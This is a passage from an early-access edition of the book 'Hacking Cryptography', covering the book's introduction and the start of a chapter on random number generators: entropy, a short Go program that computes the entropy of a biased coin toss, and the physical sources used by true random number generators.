
Khan K. Hacking Cryptography. Write, Break, and Fix Real-World... (MEAP v4) 2023


MEAP Edition

Manning Early Access Program


Hacking Cryptography
Write, break, and fix real-world solutions
Version 4

Copyright 2023 Manning Publications

For more information on this and other Manning titles go to


manning.com
welcome
Thank you for purchasing the MEAP edition of Hacking Cryptography.

Cryptography has recently been thrust into the limelight thanks to cryptocurrencies, but it
has been around for far longer than that. It protects everything we do in the digital world and
is the last and most reliable line of defense for our data. Despite its significance and success,
cryptography is anything but infallible. While the theoretical foundations of this field of
knowledge are pretty sturdy, the practical applications seem almost doomed to eventually run
afoul of one implementation mistake or another.

A good understanding of how physical locks work can be obtained by learning how to pick
locks. That’s essentially what this book is about. While there are many books that explain how
cryptography is implemented (akin to how locks are made), this book builds an understanding
of cryptography by looking at how cryptographic locks are usually picked.

We hope that this book will expand the general understanding of, and discourse surrounding,
cryptographic engineering. We look forward to hearing your thoughts on what can be
improved. The MEAP is a somewhat unique thing in the publishing industry, and your feedback
is exactly the proverbial gold it is designed to mine. It is an exciting prospect to be able to
improve your book based on actual reader feedback while you’re still writing it, and we heartily
appreciate the opportunity to do so.

Please be sure to post any questions, comments, or suggestions you have about the book in
the liveBook discussion forum.

Thank you,
—Kamran Khan & Bill Cox
brief contents
1 Introduction
2 Random number generators
3 Implementing and exploiting RNGs
4 Stream ciphers
5 Block ciphers
6 Hash functions
7 Public key cryptography
8 Digital signatures
9 Common pitfalls for crypto implementations
1
Introduction

This chapter covers
What is cryptography and why is it important?
Where and how is cryptography used?
How is this book going to cover cryptography?
How will our approach differ from other books that already cover this field?

Getting cryptography right is paramount for ensuring digital security in the modern world.
The mathematical ideas and theory behind cryptography are quite hard to break, while the
implementations (transforming mathematical ideas to reality via engineering processes, e.g.,
programming code and designing hardware) have orders of magnitude more vulnerabil-
ities that are much easier to exploit. For these reasons, malicious actors regularly target
flaws in implementations in order to “break” crypto. We wanted to capture these attacks
with an organized approach so that engineers working in information security can use this
book to build an elementary intuition for how cryptographic engineering usually falls prey
to adversaries.
In the upcoming chapters, we will dive into the technical details of how cryptography is
implemented and exploited, but before that let’s first go through a high-level view of what
cryptography is.
1.1 What is cryptography?
Cryptography is primarily the art of securing data by transforming or encoding it in a way
that makes it incomprehensible for everyone except the intended recipients.
Imagine an impenetrable safe that can only be opened with a unique key. You leave the
key with a relative and then travel across the country taking the safe box with you.
Now, when you need to send something secretly to this relative you put the items in the
safe and ship them using regular mail. The post office can see who the box is addressed
to (because they need to deliver it) but they (or anyone else, e.g., mailbox thieves) cannot
open the box to see the contents. Only the relative who has the specific key can retrieve
the contents once they receive the box.
Cryptography can be thought of as the digital equivalent of the safe box in the preceding
example. One of its primary uses is to protect the secrecy of digital messages while they
are transported around the world (by various internet service providers) in the form of
internet packets.
Protecting messages against eavesdroppers has historically been the main area of focus
for practitioners of cryptography. In the last half-century, however, cryptographic tools
have also come to be used to ensure the integrity and authenticity of data. Going back to
the example of the shipping boxes, this would be akin to providing some incontrovertible
proof that nobody tampered with the box while it was en route.
Cryptography is the cornerstone of computer and network security in today’s world
and is by far the best tool for the job if you want to protect data against (both malicious
and accidental) exposure and/or corruption.
Data itself has grown exponentially in importance as governments, businesses and con-
sumers imbue it with meaning and significance; to the point where it is often referred to
as the “gold of the 21st century”. At its core, the main ingredients that drive the digital
revolution are:

Consumption of data (e.g., via input devices)
Processing of data (e.g., via processors)
Transmission of data (e.g., via network devices)
Storage of data (e.g., on hard drives)
Output of data (e.g., via monitors)

Whether we are watching video streams, doing online banking, working from home via
video calls, or playing video games, data drives our digital lives – and by extension, our
physical ones as well.
The infrastructure that deals with these truly gargantuan amounts of data is almost
always shared. For example, when we open a bank account we do not get a banking kiosk
installed in our homes with a dedicated physical wire to the bank’s mainframes. We instead
use the internet to access the bank’s servers and our digital traffic shares the physical path
with many other businesses and customers along the way.
Sharing the infrastructure, however, implies that the data is exposed to parties other
than the ones it was intended for. Not only could others look at this data, but they can
also actively modify or corrupt it for nefarious gains. Cryptography guards data against
these scenarios; e.g., ensuring that our Internet service providers cannot see our emails
or someone who has access to our Wi-Fi (possibly in a public place) cannot modify our
transactions when we are making online payments.

The Enigma encryption machine
Enigma was a famous encryption machine used by the Germans during World War II
for encoding secret military messages. Alan Turing and other researchers cracked the
encryption scheme which allowed them to decode these messages quickly. Breaking
the Enigma cipher was one of the most important victories by the Allied powers and
significantly tilted the balance of power during the war.

Other areas, such as military applications, rely even more heavily on the secrecy and
integrity of data. Breaking the encryption used by the Enigma machine proved to be a
pivotal advantage for the Allies in World War II. It would not be an overstatement to say that
while secrecy and confidentiality of messages have always been important, providing these
properties at scale has become a crucial aspect of modern society. Those who could do it
well gained distinct competitive advantages and those who lagged (whether it was nations
or corporations) paid the price dearly with the loss of consumer confidence, revenues, po-
litical influence; and even strategic setbacks in full-scale wars.
Cryptography is used to accomplish the following goals:
Confidentiality: Protect data so that only the intended parties can see it. For example,
the data on your laptop’s hard drive should remain inaccessible to an attacker who
steals it.
Integrity: Protect data so that it is not modified or corrupted while it is being shared
between legitimate parties.
Authenticity: Ensure that an entity is who they claim to be. For example, if you are
communicating with an old schoolmate over a messaging app, you want to make sure
that it is indeed them at the other end and not some malicious code or employee
masquerading as your friend.

1.2 How does cryptography work?


1.2.1 Confidentiality
Confidentiality guards data against being seen by unwanted entities. It accomplishes this
by depending on “keys” which are available to all the intended participants but not any
eavesdroppers. In its simplest forms, a secret key is used to encrypt data as shown in figure
1.1. The same key is used to decrypt the data back. This is also known as “symmetric key”
encryption as the same key is used to both encrypt & decrypt data. The eavesdropper only
sees encrypted data which should be indistinguishable from random garbage bytes.
Figure 1.1 Usage of “symmetric” keys for encryption and decryption

It is important to note that the data should remain protected even if an attacker knows
every detail about the encryption algorithm except for the secret key itself. This is known
as “Kerckhoffs’s principle”. A system violates this principle when its security hinges on
whether its implementation details (e.g., the algorithm, the source code, and design
documents) are known to adversaries. Unfortunately, this principle is overlooked far too
often in real-world engineering decisions; mostly as a result of time constraints (publicly
auditing implementations and leveraging trained eyeballs takes time and resources) and
sometimes as an artifact of human psychology (it’s no fun to have your work attacked,
even when it’s important that it be).

Kerckhoffs’s principle
A cryptosystem should be secure even if an attacker knows everything about the sys-
tem except for the key.

1.2.2 Integrity
While confidentiality protects data against being seen, integrity protects data against being
modified or corrupted. Figure 1.2 shows the usage of a key to “sign” the data, essentially
generating a strong pairing between the data and the signature. The data can then be sent
to a trusted party – who also has the secret key – along with the signature without any
fear of it being modified along the way (e.g., by an Internet Service Provider). Since any
attacker attempting to corrupt the data would not have the secret key they would not be
able to generate a valid signature. Once the data reaches its intended destination the trusted
party can use its copy of the secret key to verify the signature. Therefore, while data is
transmitted in plain sight, it is guarded against modification by ensuring integrity.

1.2.3 Authenticity
Authenticity is a special case of integrity. Integrity helps prove that a particular piece of
data was not modified. Authenticity builds upon that assertion to conclude that such data
was in control of a particular entity at some point.

Figure 1.2 Usage of “symmetric” signing for ensuring integrity

For example, imagine a website that does not want its users to provide a username and
password each time they visit. To improve the user experience the website generates a
“token” upon successful login (i.e., a piece of data signifying that the user provided the
correct username and password) and signs it with a secret key. The signed token is then
downloaded to the user machine and for
subsequent visits, it is automatically provided to the website, which uses its secret key to
verify the integrity of the token. If the token signature is valid, the website can assume that
it issued the token itself at some prior point and building on that assumption it can trust
the username specified in the token. In other words, the website has authenticated the user
by their possession of a cryptographic token.
We can find some very rough analogies for confidentiality, integrity, and authenticity
around us. If a super-unforgeable stamp existed that recipients could verify, it could be
used to stamp an envelope’s seal. The envelope provides confidentiality against
eavesdroppers. The stamp provides integrity: the recipient can verify it and thereby trust
the contents of the envelope. Let’s say the envelope contained a local newspaper from
some remote town. You could then naturally conclude that whoever possessed the stamp
was in that particular town on a particular day. That last conclusion admittedly requires
a leap of faith (e.g., maybe the stamp was lost or stolen, maybe the newspaper was mailed
and then stamped in a different town) but you can still base a reasonable assumption of
authenticity on the integrity of the envelope. Similarly, the formula for Coca-Cola is
confidential. The caps on the bottles help us consumers
verify the integrity of the container and based on the results of our integrity check (and
the time/location of our purchase) we decide that the contents of the bottle are indeed
what they say on the label, i.e., they are authenticated by the Coca-Cola company and the
appropriate regulatory food authorities.

1.3 Attacks on cryptographic theory versus attacks on implementations


Cryptography is not new; at its core, it is driven by mathematical ideas that are sometimes
hundreds of years old. There are dozens of books with excellent coverage of cryptographic
theory and examples of how to implement that theory in academic settings.
However, most of the existing material advises against writing your own cryptography
for real-world applications. There are good reasons for that; cryptographic implementa-
tions are extremely hard to get “right”. Code that looks safe and secure ends up being
broken all the time. Bugs and programming defects manifest themselves in cryptographic
code in subtle ways and generate disastrous consequences if the code is relied upon for
protecting something critical.
If you are writing a JavaScript front-end application, a bug might produce a bad user
experience. If you are writing a machine-learning model for music recommendations,
obscure bugs might generate wonky suggestions. Both the stakes and the engineering
requirements for precision are different in the world of cryptography, where the most advanced
adversaries will be attacking implementations via extremely sophisticated means and subtle
bugs can have huge ramifications for the security of a system. For example, a cryptographic
key might be broken just by analyzing the power consumption of the device where com-
putation is happening. It takes a truly unparalleled amount of vigilance and care to write
cryptographic code that can stand the test of time.
One example of a cryptographic implementation bug bringing down the system’s secu-
rity is Sony’s PlayStation 3; the gaming console remained secure for almost half a decade
until it was discovered that some of the random numbers were not being generated prop-
erly as part of some cryptographic operations. That simple mistake allowed Sony’s critical
private key – which was not even present on consumer hardware and was never meant to
leave Sony’s secure data centers – to be calculated and published by hackers.
Therefore, all the cryptography books advise against relying on your own cryptographic
implementations. In fact, this book is going to do the same! The difference, however, is
that this book covers how cryptography is implemented in the real world and how it has
been broken time and again. These ideas and practices are interspersed throughout presen-
tations, blog posts, research papers, specialized documents and vulnerability reports. This
book aims to capture the intricacies, pitfalls and hard-learned lessons from these resources
and present them in an organized manner in book form.
Most cryptographic code is broken via vulnerabilities in its implementation as opposed
to weaknesses in its mathematical theory. Many of the world’s brightest minds attack
the mathematical theory relentlessly before it is adopted as a standard. For example, one
of the most commonly used algorithms is Advanced Encryption Standard (AES) which
was adopted at the turn of the millennium after a three-year-long selection process where
many top cryptographers analyzed and debated more than a dozen candidates before se-
lecting the Rijndael algorithm as the winner. AES continues to be used extensively for
protecting everything from bank transactions to top-secret classified data. There are still
no known practical attacks against correctly-implemented AES. (“Practical” here implies
that contemporary adversaries would be able to leverage such an attack using a reasonable
amount of time and resources.)
On the other hand, systems employing AES have been broken time after time due
to weaknesses introduced by implementation bugs. For example, there have been many
practical attacks utilizing a class of bugs in how messages are “padded” (filled with empty
data for engineering reasons) that allow hackers to see data encrypted by vulnerable AES
implementations.
The implementations need to be updated much more frequently and even the most
accomplished engineers cannot foresee all the ways the code will interact with machines
and data. Due to these factors, it is more cost-effective for sophisticated adversaries to
target security gaps in implementation instead of attacking the theory itself. Therefore, we
will focus on how the engineering aspect of cryptography is usually broken, as opposed to
mathematical attacks on the theory itself.

1.4 What will you learn in this book?


This book will teach you how popular cryptographic algorithms are implemented in prac-
tice and how they are usually broken. The reader can use this information as an introduc-
tion to cryptography but we are not going to cover the underlying theory behind those
algorithms.
We will be using the Go programming language for most of the coding examples in this
book.¹ Go is a simple language that is well-suited for rapid prototyping and teaching
engineering concepts. Code listings and exercise solutions are publicly available in the
GitHub repository at https://github.com/krkhan/crypto-impl-exploit.
There are good reasons why most people should not implement their own cryptography
in production code (i.e., code that business outcomes rely on). As we saw in the
preceding section, cryptographic implementations are extremely hard to get right. There-
fore, when choosing how to leverage cryptography the better engineering decision is to
rely on existing implementations that are widely used and thoroughly tested. For exam-
ple, OpenSSL is a popular cryptographic engine that has had its fair share of bugs over the
years but is a safe choice because of the large number of huge enterprises and governments
that rely on it for security. It is in the combined vested interests of all those entities that
bugs in OpenSSL be discovered and fixed as soon as possible.
The general principle in security engineering is to hedge your bets with the broader
community and big players. For example, instead of writing your own cryptographic pro-
tocol (and associated code) for message encryption you should rely on TLS (Transport
Layer Security) and specifically on versions and algorithms of TLS recommended for a
good security posture.
Therefore, for most businesses and organizations the recommended security design
involves following best engineering practices and using existing cryptographic solutions
the right way – which is a significant challenge in its own right (e.g., you can certainly end
up using the right cryptographic fundamentals while overlooking weaknesses caused
by the complexities of their interactions).
Building an intuition for how security designs are weakened by flaws in cryptographic
implementations is not straightforward. This book aims to help the reader start grokking
the general attack principles and some common scenarios in which those principles are
applied. This understanding can help you in a few different areas:

¹ Tutorial: Get started with Go, https://go.dev/doc/tutorial/getting-started


If you are going to work on implementing cryptography, possibly at one of the
large enterprises, how to avoid common pitfalls.
How to perform code reviews and assess the security posture of existing implementations.
When security vulnerabilities are discovered and published in existing cryptographic
software, how to assess their implications and reason about those bugs in a
substantive manner.
If you do need to implement cryptography for something that isn’t widely used yet
(e.g., cryptographic elections, or leveraging cryptography to improve privacy in
machine-learning algorithms), how to follow best practices for writing secure code.

None of this will preempt the need for getting your code reviewed by as many experts
as possible. You cannot point to any cryptographic implementation and claim that it is
secure. The best you can do is to have as many people try to break it as possible and then
fix the bugs as fast as possible to build confidence in the codebase. Eric Raymond
famously formulated this as Linus’s law, named after Linux creator Linus Torvalds: “given
enough eyeballs, all bugs are shallow.” For cryptographic code that is both a curse and a blessing. When bugs are
found in cryptographic code they produce vulnerabilities. On the other hand, when you
have enough eyeballs you approach the tail-end of remaining bugs as they become harder
to find and the code in question becomes reasonably safe. This book aims to assist in the
training of those eyeballs.

DO NOT implement your own cryptography


It is okay to use the contents of this book to learn about how cryptography works
and how it is usually broken. It is also okay to go further and read about more crypto
vulnerabilities and discuss them. In fact, it is even okay to try and break something new.
But please do not try to implement your own cryptographic code based on anything you
read here. If there is one takeaway from this book it’s this: it requires extreme discipline,
precision, knowledge, expertise and professional training to write secure cryptographic
code. This book only aims to organize the available knowledge in specific areas and
does not compensate for the rest of those qualities. A close analogy would be books
on surgery: they serve to organize that body of knowledge, but no one in
their right mind would feel that reading a medical text equips them to perform surgery
on their own.

1.5 Summary
Cryptography is the art of protecting the confidentiality and integrity of data. It con-
sists of mathematical theory and software (code) or hardware (dedicated chips) im-
plementations that leverage those mathematical ideas.
Cryptographic algorithms (i.e., the mathematical theory) are developed and adopted
after careful consideration and debate by top experts in the field.
Most cryptographic code is broken via attacks on its engineering implementation as
opposed to weaknesses in its mathematical theory.
Data is all around us and permeates shared infrastructure, where it is paramount
to ensure its secrecy and safety.
When leveraging cryptography for security a good engineering approach is to use
well-established implementations.
Complex interactions between (even well-established) cryptographic components
can end up causing subtle weaknesses.
Readers of academic material on cryptography are well advised not to write their
own cryptography because of the risk of subtle bugs that can compromise the security
of the whole system.
For cryptographic code that does have good reasons for being written from scratch, it
is valuable to crowdsource the review process and get the code reviewed by as many
experts as possible.
2
Random number generators

This chapter covers
The importance of random numbers for cryptography
Quality of random number generators (uniform distribution & entropy of RNGs)
Different types of random number generators (cryptographically secure versus pseudo-random number generators)
Example: Implement and exploit linear-congruential generators (LCGs)

In this chapter, we lay the foundations for understanding what random numbers are and
what some of the different kinds of random number generators look like. We shall implement and
exploit an insecure but quite widely used type of RNG known as the linear-congruential
generator (LCG). LCGs are not meant to be used for security-sensitive applications but will
help us get into the habit of implementing and exploiting algorithms. (In the next chapter
we shall implement and exploit a cryptographically secure RNG.)
My first encounter with randomness was when I used the RAND button on my father’s
scientific calculator. Whenever I would press it I would get a seemingly different number.
This confused me endlessly. As a kid, you have some intuition about the limits of the
world around you. For example, you know that while folks inside the TV represent real
people, you cannot physically go inside the box. I understood that human beings have
created machines that could do 2+2 for us and give us answers. But the machine was under
our control. How could human beings ask a machine to decide something apparently all
on its own? Did that mean that the machines were thinking for themselves? I was too
young to comprehend the differences between determinism and randomness, but as I grew
up, learning about random number generators helped me wrap my head around how the
calculator was working.¹
Let’s begin by taking a deeper look at what random means. Imagine a magician asking
you, “Think of a random number between 1 and 10”. Most of us understand at an intuitive
level what that means. The magician is asking us to think of a number that they supposedly
cannot guess or predict.
Essentially the magician is asking you to generate a random number. We could therefore
visualize random number generators as something that produces an arbitrary sequence of
random numbers.

Figure 2.1 RNGs generate random numbers that are hard to predict

You would think that we would be pretty good at such a rudimentary task but as it
turns out human beings are lousy RNGs. Ideally, if you ask an RNG to generate one thou-
sand numbers between 1 and 10 you would get roughly a hundred 1s, a hundred 2s,
a hundred 3s and so on. In other words, the distribution of generated numbers would
be uniform. On the other hand, if you ask one thousand people to think of a number be-
tween 1 and 10 (or the same person a thousand times, although it is advised against for
reasons unrelated to random numbers or cryptography) you are likely to get many more
3s and 7s than 1s and 10s. This might seem inconsequential but the same problem plays
out at a larger scale where many people end up picking the same password under similar
constraints.

2.1 Why do we need random numbers for cryptography?


Random numbers are oxygen to the world of cryptography. The success of cryptography’s
primary goals (confidentiality, integrity & authenticity) depends crucially on the “quality”
of random numbers.
When asked to think of a number between 1 and 10 you are essentially picking from a list
of available choices. The same principle applies to, for example, cryptographic tools “gen-
erating” new keys by selecting them from a list of possible choices. If the keys they pick are
not uniformly distributed it could lead to attackers guessing the keys and bypassing any
security provided by the underlying algorithms. Even slight biases could produce disastrous
consequences. Let’s take a look at an example that is not directly related to cryptography
but outlines the basic idea of how biases in distribution make guessing easier.

¹ David Wong had a similar experience when he was young. He talks about it in the chapter on randomness in
his excellent book Real World Cryptography.

2.1.1 Uniform distribution: Making things harder to guess


Imagine a medical portal that asks users to pick an 8-digit pin as their password. Passwords
would therefore look like 91838472 and 64829417.
Let’s say you are trying to brute-force a single password for a user account on this
website. The very first guess you would make would be choosing from a list of around
100 million possible passwords (00000000 to 99999999). If we put our species’ dismal
performance as RNGs aside for a moment and assume that the passwords are uniformly
distributed, you would need to make around 50 million attempts on average before hitting
the right password for a user’s account.
Now suppose that the medical portal sets the password as users’ birthdays expressed in
the form MMDDYYYY where the first two digits represent the month, the middle two represent
the day and the last four represent the year for a particular user’s birthday (quite a few
medical websites do this, unfortunately). How many guesses would you need to make now
before getting lucky? There are 12 possible values for MM, and 31 possible values for DD
and we can try the last 150 years (as the upper cap on the lifespan of a reasonable person)
for YYYY. The number of possible passwords is now shown in the equation 2.1.

|MM| × |DD| × |YYYY| = 12 × 31 × 150 = 55800    (2.1)
Instead of 100 million possible passwords, the number has now been reduced to 55800.
In fact, we would on average need to make only around 28 thousand guesses before finding
the right password – a number much smaller than 50 million! The passwords are still
8 digits long, as before; e.g., November 24, 1988 would be represented as the eight-
digit number 11241988; but the range of possible passwords has been reduced drastically,
making the job of an attacker far easier than before.
When a cryptographic key is picked, any bias in the RNG where it strays from uniform
distribution could make the job of guessing keys easier for the attackers. There are many
other uses for random numbers in the area of cryptography. For example, your passwords
are mixed with random numbers before some computations are performed on them to
make them secure. (We will discuss the exact nature of those computations in our chap-
ter on hashing.) In cryptographically-verifiable elections, votes are mixed with random
numbers to ensure that votes to the same candidate do not end up producing the same
encrypted data.
We therefore conclude that for cryptographic needs, an RNG such as the one shown
in figure 2.1 should produce output (the lone arrow in the picture) that is uniformly dis-
tributed across the entire range of possible outputs.
2.1.2 Entropy: Quantifying unpredictability
Another important characteristic of the RNGs is entropy, which can be defined as the mea-
sure of uncertainty (or disorder, in terms of its classical definition) in a system. In a fair
coin toss, where both sides have an equal chance of landing face up, the entropy is 1 bit. If we
denote heads by 1 and tails by 0, we are equally unsure about whether the value of that
single bit will be heads or tails. If we were to predict the outcome of 10 successive fair coin
tosses we would have an entropy of 10 bits.
If the coin had been tampered with in some way, the entropy would be less than 1 bit.
In fact, the more biased the coin is, the lower the entropy would be. An extreme example would
be that if you have tails on both sides of the coin the entropy would be 0 bits. If the coin
has been tampered with so that heads has a 75% probability of coming up and tails only
25%, the entropy of such a coin toss would only be roughly 0.8 bits. Let’s see how.
The entropy of a probability distribution (e.g., distribution of numbers generated by an
RNG) can be calculated as shown in the equation 2.2.


H(X) = − Σ x∈X px × log2(px)
     = −p1 × log2(p1) − p2 × log2(p2) − ... − pn × log2(pn)    (2.2)

p1 is the probability of the first choice being picked, p2 is the probability of the second
choice being picked, and so on. Each probability is multiplied by its binary logarithm (log
to the base 2), the products are summed, and the sum is negated. In terms of a coin toss, we
only have pheads and ptails. The sum of all probabilities for a given probability space is 1.
In other words, while there’s a 50% (0.5) chance of either side coming up each time you
flip the coin, there is a 100% chance that the answer will be one of those two options. Each
probability value is at most 1, which makes its logarithm negative (or zero), so negating
the sum produces a positive value for the entropy.
We can write a program to calculate the entropy of a biased coin toss. It will also help us get
into the flow for upcoming code examples. In listing 2.1 we are going to:
Take two floating point numbers as input, representing the probability
of heads and of tails respectively.
When parsing the input, require the sum of the two numbers to be equal to 1 (and
also not to exceed it). Because of the way floating point numbers work in Go, if we
simply compare (heads+tails) to 1 for equality, the comparison would fail for some inputs, e.g.,
0.9 and 0.1 (even though their sum should be equal to 1). For this reason, on line 34
we measure how close the sum is to 1 instead of testing for equality.
Apply the formula in equation 2.2 to these values and output the result.
These steps are shown in the flowchart in figure 2.2.
Figure 2.2 Flow chart for calculating the entropy of a biased coin toss
Listing 2.1 ch02/biased_coin_toss/main.go

1 package main
2
3 import (
4     "fmt"
5     "math"
6     "os"
7     "strconv"
8 )
9
10 func main() {
11     var line string
12
13     fmt.Printf("Enter probability of heads (between 0.0 and 1.0): ")
14     fmt.Scanln(&line)
15     heads, err := strconv.ParseFloat(line, 64)
16     if err != nil || heads < 0 || heads > 1 {
17         fmt.Println("Invalid probability value for heads")
18         os.Exit(1)
19     }
20
21     fmt.Printf("Enter probability of tails (between 0.0 and 1.0): ")
22     fmt.Scanln(&line)
23     tails, err := strconv.ParseFloat(line, 64)
24     if err != nil || tails < 0 || tails > 1 {
25         fmt.Println("Invalid probability value for tails")
26         os.Exit(1)
27     }
28
29     if heads+tails > 1 {
30         fmt.Println("Sum of P(heads) and P(tails) must not exceed 1")
31         os.Exit(1)
32     }
33
34     if 1-(heads+tails) > 0.01 { // measures the delta (how far the value is) of (heads+tails) from 1
35         fmt.Println("Sum of P(heads) and P(tails) must be 1")
36         os.Exit(1)
37     }
38
39     entropy := -(heads * math.Log2(heads)) - (tails * math.Log2(tails))
40     fmt.Printf("P(heads)=%.2f, P(tails)=%.2f, Entropy: %.2f bits\n", heads, tails, entropy)
41 }

Let’s run this program for a few inputs as shown in listing 2.2.

Listing 2.2 Output for ch02/biased_coin_toss/main.go

P(heads)=0.50, P(tails)=0.50, Entropy: 1.00 bits
P(heads)=0.75, P(tails)=0.25, Entropy: 0.81 bits
P(heads)=0.80, P(tails)=0.20, Entropy: 0.72 bits
P(heads)=0.10, P(tails)=0.90, Entropy: 0.47 bits

As you can see, even though we still get one bit of output (i.e., whether the result
was heads or tails) whenever we toss the coin, the entropy of the output decreases as the coin
toss becomes more biased. Another way to understand this is to look at it from the other
side: if a coin toss has an entropy of 1 bit, guessing its output is as hard as it can
be for a coin toss. If it has an entropy of 0.47 bits, we know one outcome is likelier than
the other, so guessing it becomes relatively easier.

Figure 2.3 Entropy of a biased coin toss

Figure 2.3 shows how entropy (the solid curved line) changes as the coin toss becomes
more biased. The dotted lines represent the probabilities of heads or tails coming up.
Please note that their sum always remains exactly equal to 1 because they represent the
entire probability space, i.e., there is no third outcome. Entropy is maximum (the peak in
the middle) when both heads and tails have a 50% probability of occurring. That is when
it is the hardest to predict which way the coin is likelier to land.
So how is entropy related to RNGs? If the output of an RNG is uniformly distributed,
the job of guessing the output is as hard as it could be. We have maximum possible uncer-
tainty about the output and entropy is the measure of uncertainty.

The relation between output distribution and entropy of an RNG


A random number generator has maximum entropy when its output distribution is
uniform.

2.2 Understanding different types of RNGs


Now that we have a basic understanding of what RNGs do (they generate random num-
bers), and how we evaluate their quality (i.e., how close their output is to a uniform distri-
bution, which maximizes the entropy of the output bits), let's look at
some different types of RNGs and how they differ from each other.
RNGs can be broadly categorized into:
True Random Number Generators (TRNGs) rely on non-deterministic physical
phenomena (e.g., quantum unpredictability) to generate random numbers.
Pseudo Random Number Generators (PRNGs) use a deterministic algorithm (usu-
ally implemented in software) to generate random numbers.
Cryptographically Secure Pseudo Random Number Generators (CSPRNGs) are
PRNGs that satisfy extra requirements needed for cryptographic security.

2.2.1 True Random Number Generators (TRNGs)


Coin toss, dice roll, nuclear decay, thermal noise from a resistor, and even the weather 2
are examples of phenomena that generate unpredictable values that can be used as sources
of randomness, with varying levels of quality (entropy) and performance (how fast they
can produce new numbers). For example, you could decide whether to
use an umbrella based on the random physical phenomenon of rain, but that decision will
not change every millisecond. The rate of generation for the randomness is bound by what
you are sampling (is it raining?), and how often the underlying physical conditions change
(it would take at least a few minutes for the rain to start or stop).

Figure 2.4 TRNGs sample physical phenomena to generate random numbers

In general, we want TRNGs to satisfy the following properties:


They should protect (e.g., by tamper-proofing) against attackers that have physical
control over the TRNG and want to either predict or influence its output.
They should provide a physical model that predicts the rate of generation and en-
tropy of generated bits based on the fundamental physical properties of the under-
lying phenomena. These "health checks" should preferably shut down the TRNG if
its operation is deemed to be faulty. Please note that while the model helps in
quantifying the operational characteristics of the RNG (i.e., rate of generation and
entropy of generated bits), it does not predict the actual bits. It essentially answers
the questions "Are you generating random enough bits?" and "Are you generating
random bits fast enough?"
2 Random weather. https://quantumbase.com/random-weather/

TRNGs sample the physical world to generate values that are practically unpredictable.
(There could be a philosophical argument that we are living in a deterministic universe
and nothing is truly "unpredictable", but it is not relevant for cryptographic discussions.
We only need the values to be un-guessable by contemporary adversaries on Earth.) This
is shown in figure 2.4. Some of these phenomena include:


Nuclear decay sampled by a Geiger counter.
These generate "true" random numbers in the truest sense of the word, as nuclear
decay is a random process at the level of single atoms (leading Albert Einstein to
famously proclaim "God does not play dice", which is exactly what we want to play).
It is impossible to predict when a particular atom will decay, but if you group several
identical atoms the overall decay rate can be expressed as a half-life, defined
as the time required for half the atoms, on average, to decay. The probabilistic
process of decay can be sampled by a Geiger counter to generate digital bits. The
reason this method is not widely used is that reliable detection is expensive, as is
obtaining radioactive sources that satisfy the desired parameters (e.g., rate of generation).
Atmospheric noise detected by radio receivers.
These are cheap to build but are susceptible to physical attacks where an adversary
can easily influence the output of the RNG via electromagnetic interference.
Measuring variance/drift in the timing of clock signals.
This method is cheap. Clock signals are already the backbone of almost every modern
processor, so it does not require new hardware, but it does take a great deal of care to
get the implementation right. Measuring clock drifts is not trivial, as clocks were not
designed for generating random numbers; and the behavior is easily influenced by
adversaries with either physical access (e.g., being able to induce power-supply noise) or
remote access to the processor (e.g., being able to execute other applications on the
same processor).
Electric noise generated by the avalanche or Zener effect.
Diodes are components used in electric circuits to protect other components by let-
ting the current flow in only one direction. Certain diodes have some interesting
physical properties where they can generate noise that can be leveraged by an RNG.
We will look into these in more detail in the next section.
Ring oscillators.
This method is similar to the clock-drift technique in the sense that it also relies on
the jitter present in clock signals. However, instead of measuring the jitter directly,
it places an odd number of NOT gates that are connected in a ring so that the final
output keeps oscillating between two voltage levels.
Modular entropy multiplication (MEM).
This is a relatively new method invented by Peter Allan in the late 1990s and in-
dependently by Bill Cox (co-author of this book) in the 2010s. MEM works with
an analog source of noise (which could come from one of the methods listed above). It
amplifies this noise and then keeps the voltage fluctuating dramatically based on a
set of very simple rules. This method is low-cost, protects against electromagnetic
interference, and provides a physical model to assess the health of the RNG.
Avalanche effect and ring oscillators have found widespread application in the industry
as RNGs so we are going to dive deeper and discuss the implications and pitfalls of their
usage. We will then discuss MEM and how it protects against certain attacks that target
other electric noise-based RNGs.
TRNGS BASED ON AVALANCHE OR ZENER DIODES
Diodes are electronic components used to restrict the flow of current in only one direc-
tion. For example, they can be used to protect an electric circuit if the power supply input
polarity is reversed. The electric symbol for diodes is shown in figure 2.5.

Figure 2.5 Diodes help ensure the flow of current in a single direction.

When voltage is applied to the diode such that current can flow in its natural di-
rection, the diode is said to be "forward-biased". When the voltage is reversed, the diode (ideally)
stops conducting and is said to be "reverse-biased".
The fact that current does not usually flow when a diode is reverse-biased is exactly
what makes them useful. There are, however, a few unintended properties associated with
certain types of diodes. These are called "parasitic" effects as they are, generally speaking,
undesirable. Sometimes, though, even the parasitic effects can be useful, as is the case with
random-number generation and the Avalanche and Zener effects, which are two distinct physi-
cal phenomena that generate noise in an electrical circuit. This noise can then be sampled
by amplifying it and running it through an analog-to-digital converter (ADC).
Zener diodes make poor TRNGs despite their heavy usage for that purpose. There are
a few reasons why:
Zener diodes are carefully designed to reduce avalanche noise, which makes them terrible
sources of electronic noise. Note that a very common use case for Zener diodes is
power supply regulation, where noise is highly undesirable.
The parasitic Zener effect of a reverse-biased diode is not typically parameterized by
the manufacturer. The manufacturers prioritize quality control for the "proper" oper-
ation of Zener diodes as opposed to side effects when biased in the reverse direction.
The noise varies from device to device dramatically. Even worse, from manufacturer
to manufacturer variations can easily be > 10X in noise, and several volts’ difference
in breakdown voltage.
The noise from these Zener effects is fairly temperature sensitive and can change
over time as the circuit ages.
There is no physical model we can correlate well to Zener noise for assessing the
health of a TRNG.

TRNGS BASED ON RING OSCILLATORS


A NOT gate is used to logically invert its input. That is, if the input is high the output
is low and vice-versa. They are also known as inverters and are denoted symbolically by a
triangle with a small circle at the end. If you connect an odd number of inverters in a ring
their output will keep oscillating forever as shown in figure 2.6.

Figure 2.6 A ring oscillator

Typical ring oscillators have 5 or more inverters, but the number is always odd. Usually,
this oscillation is subject to thermal drift. That is, their operation (e.g., how long it takes
for the output level to fully change when input is inverted) varies in response to ambient
temperature. The underlying phenomenon providing unpredictability is the phase noise
in the electrical signal.
The ring oscillator TRNG designs have a few shortcomings and are responsible for
quite a few failures in cryptography. Here’s why:
As we saw in the guidelines at the beginning of the section, a physical model based
on the underlying phenomena that lets us calculate entropy is important for an RNG.
There is no physical model we can use to predict the operation of ring oscillator-based
RNGs (which is further complicated by the presence of thermal and other kinds of
unpredictable drifts in oscillators).
Fabrication processes generally improve over time, reducing even
thermal drift, and circuits that were designed well can end up generating highly pre-
